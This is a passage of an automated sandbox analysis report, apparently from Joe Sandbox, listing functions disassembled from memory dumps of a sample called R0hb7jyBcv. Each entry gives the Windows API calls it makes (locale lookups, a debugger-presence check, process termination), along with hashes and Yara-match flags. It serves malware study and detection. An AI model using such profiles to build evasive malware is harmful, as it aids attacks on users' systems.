GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 024F09A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 024F0A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 024F0AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 024F0AB1

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: 7748ce0e6029c247d3e83fba518dbb60ebd6edb94d070597b79549b3cd2fc524
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: 4C31B27490122CABCF61DF69D988799BBB5BF58310F5041EAE90CA7290E7309B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 024F3C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,024F3C24,00000003,00438DB0,0000000C,024F3D7B,00000003,00000002,00000000,?,024F2DD2,00000003), ref: 024F3C6F
TerminateProcess.KERNEL32(00000000,?,024F3C24,00000003,00438DB0,0000000C,024F3D7B,00000003,00000002,00000000,?,024F2DD2,00000003), ref: 024F3C76
ExitProcess.KERNEL32 ref: 024F3C88

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 4227e2fd284ca5b66b8dbffc5342e341155738b31a973549ddeaf69c772bda21
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 62E04F32100189ABCF516F15DD08A593F2AEB84381F404065FE0646231CB35DE82CA44

Uniqueness

Uniqueness Score: -1.00%

Function 024E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 024E09DC, 024E09DF, 024E09E4
l, xrefs: 024E0966
., xrefs: 024E095F

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 1f7b07edcf2f6f1f6e48b7941e461941780e1f28161fd32ea49c8b4adfaf1b3c
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 7E3148B6900609DFEB10CF99C880AAEBBF5FF58325F14504AD452B7310D7B5EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 024F2607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction ID: 1ae552e22c08bba9e28852b54e167eaf04e488544e57e1c715bbc4cdf4201285
Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction Fuzzy Hash: 20022C71E002199FDF54CFA9C9806AEBBF1FF88314F15826AD919E7384D771AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 024ECA63 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 024ECAAA
@, xrefs: 024ECA8A

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: 02b478ee97464b6cc8c583a90ffb0f3a4d21383459c27e8403a322bde8185ddf
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 393158361441828FEB19C72CE8F42A3B781FAC6126B2D83EBD0838F34AD3669446C700

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7FC Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0040C843
@, xrefs: 0040C823

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C

Uniqueness

Uniqueness Score: -1.00%

Function 004051B4 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004051B9

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 651cb6eb15f4b96bd70d515a3bc273186fd9dd4463a1bf7c30f814969f20083e
Instruction ID: 3aa3e24c883bcef65b555e6e5d184397e63da5dbd41a8fa125ab18be998632de
Opcode Fuzzy Hash: 651cb6eb15f4b96bd70d515a3bc273186fd9dd4463a1bf7c30f814969f20083e
Instruction Fuzzy Hash: B1C1A171A01A16EFCB14CF24C481AABB7B2FF45304B54416AE842AB781D739FC52DF95

Uniqueness

Uniqueness Score: -1.00%

Function 024FB989 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,024FB984,00000000,?,00000008,?,?,02503766,00000000), ref: 024FBBB6

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: f4d69ad7f15837442c8003e0453ff699b709ebd16a4ffee487b6aceb5c46f4d2
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: 1DB15B315106088FD755CF28C48AB667BE0FF8A368F25865DE99ACF2A1C735D982CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0041B722 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 025007D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FDF
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02500829

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: ac5f9049be9cd1633bb3b326e1fa2afc10d0bb4c25084d8071a4d9aff8229d5d
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: 01218672910246ABEF24AB25DC81B7A77ACFF44320F14017AED05D61C0EB75D944CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0250045D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 025004CF

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 71e269fddc2ecb8938874e3974cd606669f56aba83cef7574ee6171f060095ba
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: E11129366007019FDB189F39DCE177ABB92FF84318B55442DE98647A80D3717942CB44

Uniqueness

Uniqueness Score: -1.00%

Function 004201F6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02500A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,025007A3,00000000,00000000,?), ref: 02500A31

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 18187fb1ca1a29a66053a3f4f5c0ad1e610801e1f3b615b8866a3b4c244db6c3
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: FDF0F932A10115AFDB345A26CC45BBA7B68FB40728F050469ED09A31C0EB74FE41C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 025007D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FDF
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02500829

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: d17d1c4bb2e0884c2257d81d1c5dca8c9bc6eca25ed5cf1bc956cdd43d58fef2
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: 4DF0A932751109ABDB14AB74DC81FBA73ADEF85321F0501BEEA06D72C0DA746D058BD8

Uniqueness

Uniqueness Score: -1.00%

Function 025004F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 02500544

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: 233d9f8ac44f53a20aa600368480705f0584a46bc0fba3ec3caaa0b91a6c7b69
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: E2F0AF363003055FDB249E39AC90B6A7B95FB80768F15846DEA468B6C0D7B19C428A54

Uniqueness

Uniqueness Score: -1.00%

Function 00420291 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 024F774B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024F4002,?,00000004), ref: 024F779E

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: b198f4f4577afdc63dc70adc71e2b60b00554b79f9c1fa463e609f65bb11ce08
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: F3F0C231740618BBDB11AF61EC01F7EBB62EF44711F90007AFD0926250CA755A209A89

Uniqueness

Uniqueness Score: -1.00%

Function 024F7358 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 024F1C62: RtlEnterCriticalSection.NTDLL(?), ref: 024F1C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 024F7390

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: aed349486e1d3b7ab3213ac3105936fbddd597be65f37ecf426f3640dc367206
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: 56F03C32A50304AFEB14EF69D845B5D77B1EB08715F10926EE505DB2E0CB7449448F8A

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 02500412 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 02500449

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
